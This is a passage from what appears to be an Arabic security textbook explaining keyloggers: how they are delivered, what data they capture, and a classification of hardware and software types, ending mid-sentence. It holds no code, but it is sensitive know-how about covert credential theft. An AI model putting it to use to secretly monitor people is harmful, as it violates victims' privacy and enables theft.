‫اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻧﺎس ﻛل ﯾوم‪ .‬اﻟﺑﯾﺎﻧﺎت‪ ،‬أي اﻟﺗﻲ ﺗﻧﺗﻘل ﻋﺑر اﻻﺗﺻﺎل اﻹﻧﺗرﻧت ﻣﺷﻔرة‪ ،‬ھﻲ أﯾﺿﺎ ﻋرﺿﺔ ﻟل‬
‫‪ Keyloggers‬ﻷن ‪ Keyloggers‬ﯾﺗﺗﺑﻊ ﺿرب اﻟﻣﻔﺎﺗﯾﺢ ﻗﺑل أن ﯾﺗم ﺗﺷﻔﯾرھﺎ ﻟﻧﻘﻠﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪402‬‬

‫ﯾﺗم ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ ‪ Keyloggers‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم ﺑﺧﻔﺎء ﻣن ﺧﻼل ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﻣن ﺧﻼل ﺗﺣﻣﯾل " ‪" drive-by‬‬
‫ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدﻣون ﺑزﯾﺎرة ﺑﻌض اﻟﻣواﻗﻊ‪ Keystroke logger’s .‬ھﻲ ﺑراﻣﺞ ﺷﺑﺢ واﻟﺗﻲ ﺗﺟﻠس ﺑﯾن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻷﺟﮭزة وﻧظﺎم‬
‫اﻟﺗﺷﻐﯾل‪ ،‬ﺑﺣﯾث ﯾﻣﻛن ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪.‬‬

‫ﻛﯾف ﯾﻌﻣل ال‪Keylogger‬‬


‫ﻣﯾﻛﺎﻧﯾﻛﯾﺔ ﻋﻣﻠﮭﺎ ﺗﺧﺗﻠف ﻛﺛﯾرا ﻋن ﻣﯾﻛﺎﻧﯾﻛﯾﺔ اﻟﻌﻣل اﻟﺗﻲ ﺗﺗﺑﻌﮭﺎ ﻣﻌظم ﻓﯾروس اﻟﺣﺎﺳوب؛ ﻓﮭو ﯾدﺧل ﻋن طرﯾﻖ ﺛﻐرات اﻟﺣﻣﺎﯾﺔ و ﯾﻘوم ﺑﻣراﻗﺑﺔ‬
‫اﻟطرﯾﻖ اﻟذي ﺗﺄﺧذه اﻟﻣﻌﻠوﻣﺎت ‪ Security Flaws‬ﺑﺎﺗﺟﺎه أﺟزاء ‪ Keyboard‬ﻓﻲ طرﯾﻘﮭﺎ ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣﻌﺎﻟﺟﺔ وﺗﺣوﯾل ھذه اﻟﺑﯾﺎﻧﺎت‬
‫ﻓﻲ اﻟﻛﻣﺑﯾوﺗر‪ ...‬ھذا اﻷﺳﻠوب ‪ ،‬ﺑﺎﻟﺗﺄﻛد أﻛﺛر ﺧطورة ﻣن إﯾﻣﯾﻼت ال ‪ Phishing‬ﺣﯾث ان إﯾﻣﯾﻼت ال ‪ Phishing‬ﻟن ﺗﺳﺑب أي ﺿرر ﻣﺎ ﻟم‬
‫ﯾﻘم اﻟﻣﺳﺗﺧدم ﺑﺎﻟرد ﻋﻠﯾﮭﺎ أو ﺑﻔﺗﺢ ﺻﻔﺣﺎت اﻹﻧﺗرﻧت اﻟﺗﻲ ﺗﺣﺗوﯾﮭﺎ‪ ،‬ﻓﻲ ﺣﯾن ﺑﺎﻟﻧﺳﺑﺔ ﻟل ‪ Keylogger‬ﻓﺄﻧك ﻻ ﺗﺣﺗﺎج ﻷي رد ﻓﻌل ﻣن ﻗﺑل‬
‫اﻟﻣﺳﺗﺧدم ﺣﯾث أﻧﮫ ﯾﺑدأ ﻓﻲ ﻋﻣﻠﮫ ﺑﻣﺟرد ﺗﻣﻛﻧﮫ ﻣن اﻟﺗﺳﻠل إﻟﻰ ﺟﮭﺎزك‪ .‬ﻋن طرﯾﻖ ﺑراﻣﺞ ‪ Keylogger‬ﻓﺎﻧﮫ ﻣن اﻟﻣﻣﻛن أن ﯾﺻل إﻟﯾك ﻣن‬
‫ﺧﻼل ﺗﻧزﯾﻠﮭﺎ ﻣن ﻋﻠﻰ اﻹﻧﺗرﻧت دون ﻣﻌرﻓﺔ ﻣﺎھﯾﺗﮭﺎ ﺑﺷﻛل وافٍ ‪ ،‬أو ﻣن ﻣﻠﻔﺎت ﻣﺿﺎﻓﺔ إﻟﻰ إﯾﻣﯾﻼت أو ﻋن طرﯾﻖ ﻣﻠﻔﺎت ﻣﺗﺷﺎرﻛﺔ ﻓﻲ ﺑراﻣﺞ‬
‫اﻟﻣﺷﺎرﻛﺔ ﻣن ﻧوع )‪ .(Shared Files‬ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺈدﺧﺎل اﺳم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮫ‪ ،‬ﯾﻘوم ال‪ Keylogger‬ﺑﻧﺳﺦ ھذه‬
‫اﻟﻣﻌﻠوﻣﺎت )ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ﻋﻧوان أو ﺻورة اﻟﻣوﻗﻊ اﻟذي زاره( وﺣﻔظﮭﺎ ﻓﻲ ﻣﻠف‪ .‬ﺑﻌد ھذا ﯾﺗم إرﺳﺎل اﻟﻣﻠف إﻟﻰ ﻣوﻗﻊ ﻣﻌﯾن ﻋﻠﻰ اﻹﻧﺗرﻧت أو‬
‫إﻟﻰ ﺟﮭﺎز ﺳﯾرﻓر‪.‬‬

‫‪ Keylogger‬ﯾﻣﻛﻧﮫ اﻻﺗﻲ‪:‬‬

‫ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪ ،‬أي اﻟﺗﻲ ﻛﺗﺑت ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ ،‬ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮫ‪.‬‬ ‫‪-1‬‬
‫اﻟﺗﻘﺎط ﻟﻘطﺎت )‪(screenshot‬ﻋﻠﻰ ﻓﺗرات ﻣﻧﺗظﻣﺔ ﻣن اﻟزﻣن واﻟﺗﻲ ﺗﺑﯾن ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻣﺛل طﺑﺎﻋﺔ ﺑﻌض اﻻﺣرف أو ﺑﺎﻟﻧﻘر ﻓوق‬ ‫‪-2‬‬
‫زر اﻟﻣﺎوس‪.‬‬
‫ﺗﺗﺑﻊ أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻋن طرﯾﻖ ﺗﺳﺟﯾل ﻋﻧﺎوﯾن اﻟﻧﺎﻓذة‪ ،‬أﺳﻣﺎء اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﺗم ﺗﺷﻐﯾﻠﮭﺎ‪ ،‬وﻏﯾرھﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت‪.‬‬ ‫‪-3‬‬
‫رﺻد ﻧﺷﺎط اﺳﺗﺧدام اﻻﻧﺗرﻧت ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﻋن طرﯾﻖ ﺗﺳﺟﯾل ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﺗﻲ ﻗﺎﻣوا ﺑزﯾﺎرﺗﮭﺎ وﻣﻊ اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ‬ ‫‪-4‬‬
‫اﻟﺗﻲ ﺗم ادﺧﺎﻟﮭﺎ‪ ،‬اﻟﺦ‬
‫ﺗﺳﺟﯾل ﺟﻣﯾﻊ أﺳﻣﺎء اﻟدﺧول‪ ،‬وأرﻗﺎم اﻟﺑﻧك وﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﻔﯾﺔ أو اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ھﻲ‬ ‫‪-5‬‬
‫ﻋﺑﺎره ﻋن ﻋﻼﻣﺎت اﻟﻧﺟﻣﺔ أو اﻟﻣﺳﺎﻓﺎت اﻟﻔﺎرﻏﺔ‪.‬‬
‫ﺗﺳﺟﯾل ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬ ‫‪-6‬‬
‫ﻋﻣل ﻧﺳﺦ ﻏﯾر ﻣﺻرح ﺑﮭﺎ ﻟﻛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺻﺎدرة ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة‪.‬‬ ‫‪-7‬‬

‫أﻧواع ‪(Types Of Keystroke Loggers) Keylogger‬‬


‫‪ Keylogger‬ھو ﺑرﻧﺎﻣﺞ ﺻﻐﯾر واﻟذي ﯾﻘوم ﺑﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻓﻲ أي وﻗت ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ ﻛﻣﺑﯾوﺗر ﻣﻌﯾﻧﺔ‪.‬‬
‫ﯾﺗم ﺣﻔظ اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣﺄﺳورة ﻓﻲ ﻣﻠف ﻟﻠﻘراءة ﻓﻲ وﻗت ﻻﺣﻖ أو ﺧﻼف ذﻟك ﺗﻧﺗﻘل إﻟﻰ ﻣﻛﺎن ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟوﺻول إﻟﯾﮫ‪ .‬ﻷن ھذا ﺑراﻣﺞ‬
‫ﯾﺳﺟل ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﺧﻼل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﯾﻣﻛن اﻟﺗﻘﺎط ﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬وﻋﻧوان اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ وﻋﻧﺎوﯾن أﺳﻣﺎء‪ ،‬وأرﻗﺎم اﻟﮭواﺗف‪ Keylogger .‬ﻟدﯾﮭﺎ اﻟﻘدرة ﻋﻠﻰ اﻟﺗﻘﺎط اﻟﻣﻌﻠوﻣﺎت ﻗﺑل أن ﯾﺗم ﺗﺷﻔﯾرھﺎ ﻟﻧﻘﻠﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ‪ .‬وھذا‬
‫ﯾﻌطﻲ وﺻول ﻟﻠﻣﮭﺎﺟم ﻟﺗﻣرﯾر ‪ phrases‬وﻏﯾرھﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ ﺑﺷﻛل ﺟﯾد‪.‬‬
‫ھﻧﺎك ﻧوﻋﺎن ﻣن ‪ .Keylogger‬ھم ‪ hardware loggers‬و‪ .software loggers‬وﯾﺳﺗﺧدم ھﺎذﯾن اﻻﺛﻧﯾن ﻟﺗﺳﺟﯾل ﺟﻣﯾﻊ ﺿرﺑﺎت‬
‫اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم إدﺧﺎﻟﮭﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗم اﻟﺗﺛﺑﯾت ﻓﯾﮫ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪403‬‬

‫‪Hardware Loggers -1‬‬

‫‪ Hardware Keyloggers‬ھو ﻋﺑﺎره ﻋن أﺟﮭزة ﺗﺑدو ﻣﺛل ﻣﺣرﻛﺎت أﻗراص ‪ .USB‬ﯾﻛون ﻣﺗﺻﻼ ﺑﯾن ﻣﻛوﻧﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ وﻣدﺧل‬
‫‪ .USB‬ﯾﺗم ﺗﺧزﯾن ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣﺳﺟﻠﺔ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﺿﻣن وﺣدة اﻷﺟﮭزة‪ .‬ﺛم ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن ﺑﺎﺳﺗرداد ھذه‬
‫اﻟوﺣدة ﻟﻠوﺻول إﻟﻰ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ذﻟك‪ .‬واﻟﻣﯾزة اﻟرﺋﯾﺳﯾﺔ ﻟﮭذا اﻟﻧوع ھو أﻧﮫ ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮫ ﻣن ﻗﺑل ﺑراﻣﺞ‬
‫ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس‪ ،‬وﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪ ،‬أو ﺑراﻣﺞ أﻣن ﺳطﺢ اﻟﻣﻛﺗب‪ .‬وﻟﻛن ﻣن ﻋﯾوﺑﮫ ھو أن ﻟﮫ وﺟود ﻓﻌﻠﻲ ﻣﻣﺎ ﯾﻣﻛن اﻛﺗﺷﺎﻓﮫ ﺑﺳﮭوﻟﺔ‪.‬‬
‫وﯾﺻﻧف ھذا اﻟﻧوع إﻟﻰ ﺛﻼﺛﺔ أﻧواع رﺋﯾﺳﯾﺔ‪:‬‬

‫‪PC/BIOS Embedded‬‬ ‫‪-‬‬

‫اﻟوﺻول اﻟﻣﺎدي و‪/‬أو ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم ﺿروري ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر)‪ ، (Physical and/or admin-level access‬ﯾﺟب أن ﯾﺗم‬
‫ﺗﺣﻣﯾل اﻟﺗطﺑﯾﻖ ﻓﻲ ‪ BIOS‬اﻟﻛﻣﺑﯾوﺗر ﻟﻸﺟﮭزة اﻟﺧﺎﺻﺔ اﻟﺗﻲ ﺳﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ‪ .‬ﺣﯾث ان اﻟﺑراﻣﺞ اﻟﺛﺎﺑﺗﺔ ﻋﻠﻰ ﻣﺳﺗوى ‪ BIOS‬اﻟﺗﻲ ﺗدﯾر إﺟراءات‬
‫ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﯾﻣﻛن ﺗﻌدﯾﻠﮭﺎ ﻻﻟﺗﻘﺎط ھذه اﻷﺣداث ﻣﺛﻠﻣﺎ ﯾﺗم ﻣﻌﺎﻟﺟﺗﮭﺎ‪.‬‬

‫‪Keylogger Keyboard‬‬ ‫‪-‬‬

‫ﯾﺳﺗﺧدم ھذا اﻟﻛﯾﻠوﺟرز ﻟﺗﺳﺟﯾل أﺣداث ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻋن طرﯾﻖ رﺑط داﺋرة اﻟﺟﮭﺎز ﻣﻊ ﻣوﺻل ﻛﺎﺑل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﻛل ﺿرﺑﺎت‬
‫ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟذاﻛرﺗﮫ اﻟداﺧﻠﯾﺔ اﻟﺧﺎﺻﺔ اﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻓﻲ وﻗت ﻻﺣﻖ‪ .‬واﻟﻣﯾزة اﻟرﺋﯾﺳﯾﺔ ﻷﺟﮭزة اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ ﺑراﻣﺞ اﻟﻛﯾﻠوﺟرز‬
‫ھو أﻧﮫ ﻻ ﯾﻌﺗﻣد ﻋﻠﻰ ﻧوع ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﻟن ﯾﺗداﺧل ﻣﻊ أي ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف وأﻧﮫ ﻣن‬
‫اﻟﻣﺳﺗﺣﯾل اﻛﺗﺷﺎف أﺟﮭزة اﻟﻛﯾﻠوﺟرز ﺑﺎﺳﺗﺧدام أي ﻣن ﺑرﻧﺎﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻛﯾﻠوﺟرز‪.‬‬

‫‪External Keylogger‬‬ ‫‪-‬‬

‫‪ External Keyloggers‬ﯾﺗم رﺑطﮫ ﺑﯾن ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﻌﺗﺎدة واﻟﻛﻣﺑﯾوﺗر‪ .‬أﻧﮭﺎ ﺗﺳﺟل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪ .‬ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ‬
‫)‪ (External Keyloggers‬ﻻ ﺗﺣﺗﺎج إﻟﻰ أي ﻣن اﻟﺑرﻧﺎﻣﺞ‪ ،‬وﺗﻌﻣل ﻣﻊ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك رﺑطﮭﺎ ﺑﺄي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﺗﺳﺗﮭدﻓﮫ‪،‬‬
‫ﺣﯾث ﯾﻣﻛﻧﮫ رﺻد اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻟﻠﺑﺣث ﻋن طرﯾﻖ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھﻧﺎك أرﺑﻌﺔ أﻧواع ﻣن ﻛﯾﻠوﺟرز‬
‫اﻟﺧﺎرﺟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪404‬‬

‫‪ :PS/2 and USB Keylogger‬ﺷﻔﺎف ﺗﻣﺎﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻌﻣﻠﯾﺎت اﻟﺣﺎﺳوب وﻻ ﯾﺗطﻠب أي ﻣن اﻟﺑراﻣﺞ أو ‪ driver’s‬ﻟﻛﻰ ﯾﻌﻣل‪ .‬ﺗﺳﺟﯾل‬
‫ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر‪ ،‬وﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت ﻣﺛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪،‬‬
‫وﺳﺟﻼت اﻟدردﺷﺔ‪ ،‬اﻟﺗطﺑﯾﻘﺎت اﻟﻣﺳﺗﻌﻣﻠﺔ‪ ،IMS ،‬اﻟﺦ‪.‬‬

‫‪ :Acoustic/CAM Keylogger‬ﯾﻣﻛﻧﮫ اﺳﺗﺧدام إﻣﺎ ﺟﮭﺎز اﺳﺗﻘﺑﺎل )‪ (capturing receiver‬ﻗﺎدرة ﻋﻠﻰ ﺗﺣوﯾل اﻷﺻوات‬
‫اﻟﻛﮭروﻣﻐﻧﺎطﯾﺳﯾﺔ اﻟﻰ ﺑﯾﺎﻧﺎت اﻟﻣﻔﺎﺗﯾﺢ أو ‪ CAM‬اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ ﺗﺳﺟﯾل ﻟﻘطﺎت ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬

‫‪ :Bluetooth Keylogger‬ﯾﺗطﻠب اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻣرة واﺣدة ﻓﻘط‪ ،‬ﻓﻲ وﻗت اﻟﺗﺛﺑﯾت‪ .‬ﻣرة واﺣدة ﯾﺗم ﺗﺛﺑﯾت ھذا‬
‫ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‪ ،‬ﻓﺈﻧﮫ ﯾﺧزن ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﯾﻣﻛﻧك اﺳﺗرداد ﻣﻌﻠوﻣﺎت ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻣن ﺧﻼل رﺑط‬
‫ﺑﺟﮭﺎز اﻟﺑﻠوﺗوث‪.‬‬

‫‪ :Wi-Fi Keylogger‬ﯾﻌﻣل ﻟوﺣده ﺗﻣﺎﻣﺎ‪ .‬ﻋﻠﻰ ﻋﻛس ‪ ،Bluetooth Keylogger‬ھذا اﻟﻧوع ﻣن اﻟﻛﯾﻠوﺟرز ﻻ ﺗﺗطﻠب أن ﯾﻛون ﺑﺎﻟﻘرب‬
‫ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺛﺑت ﻋﻠﯾﮫ اﻟدوﻧﺟل )ﺟﮭﺎز اﻟﺗﺳﺟﯾل ﻓﻲ ‪ (Bluetooth Keylogger‬ﻻﺳﺗرداد ﻣﻌﻠوﻣﺎت ﺿﻐطﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھذا‬
‫اﻟﻛﯾﻠوﺟرز ﻻ ﯾﺗطﻠب أي ﻣن اﻟﺑراﻣﺞ أو ‪ drivers‬وﻏﯾر ﻗﺎﺑل ﻟﻠﻛﺷف ﺗﻣﺎﻣﺎ؛ وﯾﻌﻣل ﻋﻠﻰ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ .‬ﯾﻘوم ﺑﺗﺳﺟل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‬
‫وﯾرﺳل اﻟﻣﻌﻠوﻣﺎت ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ ﻣدى ﻓﺗرة زﻣﻧﯾﺔ ﻣﺣددة ﻣﺳﺑﻘﺎ‪.‬‬

‫‪Software Keystroke Loggers -2‬‬

‫ھذا اﻟﻧوع ﻣن ‪ Loggers‬ھو ﻋﺑﺎره ﻋن ﺑراﻣﺞ ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋن ﺑﻌد ﻋﺑر اﻟﺷﺑﻛﺔ أو ﻣرﻓﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻟﺗﺳﺟﯾل‬
‫ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھﻧﺎ ﯾﺗم ﺗﺧزﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻣﺛل ﻣﻠف اﻟﺳﺟل ﻓﻲ اﻟﻘرص اﻟﺻﻠب ﻷﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻏﯾر ﻣطﻠوب اﻟوﺻول اﻟﻣﺎدي ﻣن ﺟﺎﻧب اﻟﺷﺧص ﻟﻠﺣﺻول ﻋﻠﻰ ﺑﯾﺎﻧﺎت اﻟﺿﻐطﺔ ﻷﻧﮫ ﯾﺗم اﻟﺣﺻول ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت ﻋﺑر اﻟﺑرﯾد‬
‫اﻻﻟﻛﺗروﻧﻲ ﻋﻠﻰ ﻓﺗرات ﻣﺣددة ﺳﻠﻔﺎ‪ Software Loggers .‬ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟﺣﺻول ﻋﻠﻰ ﺑﯾﺎﻧﺎت إﺿﺎﻓﯾﺔ أﯾﺿﺎ‪،‬‬
‫ﺣﯾث أﻧﮭﺎ ﻻ ﺗﻘﺗﺻر ﻣن ﻗﺑل ﺗﺧﺻﯾص اﻟذاﻛرة اﻟﻣﺎدﯾﺔ ﻣﺛل ‪ .Hardware Loggers‬ﯾﺗم ﺗﺻﻧﯾف ‪ Software Loggers‬إﻟﻰ ﺳﺗﺔ أﻧواع‪.‬‬
‫وھم‪:‬‬
‫‪Application Keylogger‬‬
‫‪Kernel Keylogger‬‬
‫‪Rootkit Keylogger‬‬
‫‪Device Driver Keylogger‬‬
‫‪Hypervisor-based Keylogger‬‬
‫‪Form-Grabbing-Based Keylogger‬‬
‫‪Application Keylogger -‬‬
‫‪ Application Keylogger‬ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﻛل ﻣﺎ ﯾﻛﺗﺑﮫ اﻟﻣﺳﺗﺧدم ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟدردﺷﺔ‪ ،‬وﻏﯾرھﺎ ﻣن اﻟﺗطﺑﯾﻘﺎت‪ ،‬ﺑﻣﺎ‬
‫ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﻣﻊ ھذا ﯾﻣﻛﻧك ﺣﺗﻰ ﺗﺗﺑﻊ ﺳﺟﻼت ﻧﺷﺎط اﻹﻧﺗرﻧت‪ .‬ھو ﻏﯾر ﻣرﺋﻲ ﺗﻣﺎﻣﺎ ﻟﺗﺗﺑﻊ وﺗﺳﺟﯾل ﻛل ﻣﺎ ﯾﺣدث داﺧل اﻟﺷﺑﻛﺔ‬
‫ﺑﺄﻛﻣﻠﮭﺎ‪.‬‬
‫‪Kernel Keylogger -‬‬
‫ھذا اﻷﺳﻠوب ﻧﺎدرا ﻣﺎ ﯾﺳﺗﺧدم ﻷﻧﮫ ﻣن اﻟﺻﻌب أن ﯾﻛﺗب ﻛﻣﺎ ﯾﺗطﻠب ﻣﺳﺗوى ﻋﺎل ﻣن اﻟﻛﻔﺎءة ﻣن ﻣطور اﻟﻛﯾﻠوﺟرز‪ .‬ﻣن اﻟﺻﻌب أﯾﺿﺎ إﻋداده‪.‬‬
‫ﺗوﺟد ھذه اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ ﻣﺳﺗوى اﻟﻧواة‪/‬اﻟﻛﯾرﻧل‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﮭو ﯾﺻﻌب اﻛﺗﺷﺎﻓﮫ‪ ،‬ﺧﺎﺻﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺗطﺑﯾﻘﺎت وﺿﻊ اﻟﻣﺳﺗﺧدم‪ .‬ھذا اﻟﻧوع ﻣن‬
‫اﻟﻛﯾﻠوﺟرز ﯾﻌﻣل ﻣﺛل ﺑراﻣﺞ ﺗﺷﻐﯾل ﺟﮭﺎز ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﺣﻘﻖ ﻣﻛﺎﺳب اﻟوﺻول إﻟﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﻛﺗوﺑﺔ ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪Rootkit Keylogger -‬‬
‫‪ Rootkit-based Keylogger‬ھو ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل ﺟﮭﺎز وﯾﻧدوز ﻣزور اﻟذي ﯾﺳﺟل ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھذا اﻟﻛﯾﻠوﺟرز ﯾﺧﻔﻲ ﻣن اﻟﻧظﺎم‬
